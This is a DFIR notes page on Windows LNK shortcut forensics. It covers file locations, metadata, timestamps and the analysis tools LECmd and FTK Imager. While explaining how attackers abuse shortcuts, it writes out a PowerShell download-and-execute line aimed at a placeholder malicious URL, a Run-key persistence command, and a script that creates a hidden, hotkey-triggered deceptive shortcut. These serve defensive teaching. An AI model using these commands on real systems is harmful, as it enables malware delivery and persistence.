DFIR-Notes
Windows Forensics
Windows Forensics
  • windows Memory Forensics
  • Windows Registry Forensics
  • Windows Registry Forensics with RegRipper
  • Windows Powershell Forensics
  • Incident Response Eventhoods
  • Incident Response splunk filters
  • LNK Files (Shortcut Files) Forensics
  • Jump List Forensics
  • Prefetch Files Forensics
  • Living off the Land Binaries (LOLBins)
  • COM (Component Object Model)
  • Key Email Headers for SOC Analysts and DFIR
  • Distributed Component Object Model (DCOM)
  • legitimate Windows processes
  • UserAssist Keys
  • Application Compatibility Cache (Shim Cache)
  • CIDSizeMRU
  • Start Menu Run MRUs
  • MUI Cache
  • BAM (Background Activity Moderator)
  • SRUM (System Resource Usage Monitor)
  • Master File Table (MFT), NTFS, $LogFile, and $UsnJrnl: Forensics
  • 🔹 Windows System Processes
Powered by GitBook
On this page
  • locations:
  • How it works
  • Forensic Significance

LNK Files (Shortcut Files) Forensics

LNK files are shortcuts created automatically by Windows or manually by users. They link to files, folders, or applications and LNK file demonstrates how attackers can leverage Windows shortcuts for Initial Access and Persistence

locations:

  • %APPDATA%\Microsoft\Windows\Recent\

  • User-created LNK files can exist anywhere

File Extension: .lnk

Forensic Value of LNK Files

  • Path to the Original File: Provides the location of the linked file, though not the absolute path.

  • MAC Addresses: Useful if the file is shared over a network, revealing the MAC address of the host.

  • Network Volume Share Name: Identifies the network share name if the file is stored on a network.

  • Size of the Target: Records the size of the linked file at the time it was last accessed.

  • Serial Number of the Volume: Stores the volume serial number where the file was stored.

  • File Attribute: Contains attributes of the linked file.

  • Distributed Link Info: Provides information about distributed links, useful for tracking files across different locations.

Timestamps

  • Creation Time: When the LNK file was first created.

  • Modification Time: When the LNK file was last altered.

How it works

let us analysis the LNK file (shortcut) above

The provided image shows the properties of a LNK file (shortcut) being abused for Initial Access and Persistence. Let’s analyze its potential malicious use based on the highlighted features: Abuse of LNK Files

Target Field Abuse : Specifies the file, folder, or command to be executed when the shortcut is launched.

Target field in the shortcut is set to:

C:\Windows\System32\cmd.exe /c calc.exe

  • This means the shortcut will execute cmd.exe (the Windows command prompt) with the /c option, which tells cmd to run the specified command and then terminate.

  • In this case, it will run calc.exe (Calculator app). While this appears harmless, it can easily be replaced with a malicious payload, such as:

    • Executing PowerShell commands to download and execute malware like that

    /c powershell -ExecutionPolicy Bypass -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious-url/malware.ps1')"

1.Shortcut Key

The Shortcut key is set to Ctrl + C.

  • When this combination ( user ) is pressed, the LNK file will execute its target.

  • Malicious actors can use this to trick users into executing malicious code without realizing it. For example, by setting this shortcut in a way that mimics legitimate behavior

2.Potential for Initial Access

Phishing Campaigns:

  • Attackers can distribute LNK files disguised as legitimate documents or shortcuts.

  • For example, naming the file "Invoice.lnk" or "Report.lnk" and setting the target to execute malware

File Masking:

  • By modifying the file icon and name, the LNK can impersonate trusted files (e.g., PDFs, Word documents).

  • Example: Linking cmd.exe /c powershell -ExecutionPolicy Bypass -EncodedCommand <payload> for downloading and running malicious code

3.Potential for Persistence

Registry Modification:

  • The shortcut could execute commands to modify the Windows Registry for persistence.

  • Example:

    • cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v FakeEntry /t REG_SZ /d C:\malicious.exe

    Startup Folder:

    • Placing the malicious LNK file in the Startup folder ensures it runs every time the system boots:

      • C:\Users\<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

The attacker write the following PowerShell script to create a malicious shortcut with a custom activation key

$path                      = "$([Environment]::GetFolderPath('Desktop'))\FakeText.lnk"
$wshell                    = New-Object -ComObject Wscript.Shell
$shortcut                  = $wshell.CreateShortcut($path)

$shortcut.IconLocation     = "C:\Windows\System32\shell32.dll,70"

$shortcut.TargetPath       = "cmd.exe"
$shortcut.Arguments        = "/c calc.exe"
$shortcut.WorkingDirectory = "C:"
$shortcut.HotKey           = "CTRL+C"
$shortcut.Description      = "Nope, not malicious"

$shortcut.WindowStyle      = 7
                           # 7 = Minimized window
                           # 3 = Maximized window
                           # 1 = Normal    window
$shortcut.Save()

(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)

Forensic Significance

  • Provide metadata about accessed files, such as:

    • File path (original location of the target file).

    • File creation, access, and modification timestamps.

    • Volume and drive information (e.g., serial number).

    • Network paths (if the file is on a shared drive)

Tools for Investigation

  • FTK Imager/Autopsy: Locate and extract LNK files.

  • LnkParser or Eric Zimmerman's LECmd: Decode LNK files and retrieve metadata

For example Here I used LECmd tool and look what we got

PreviousIncident Response splunk filtersNextJump List Forensics

Last updated 5 months ago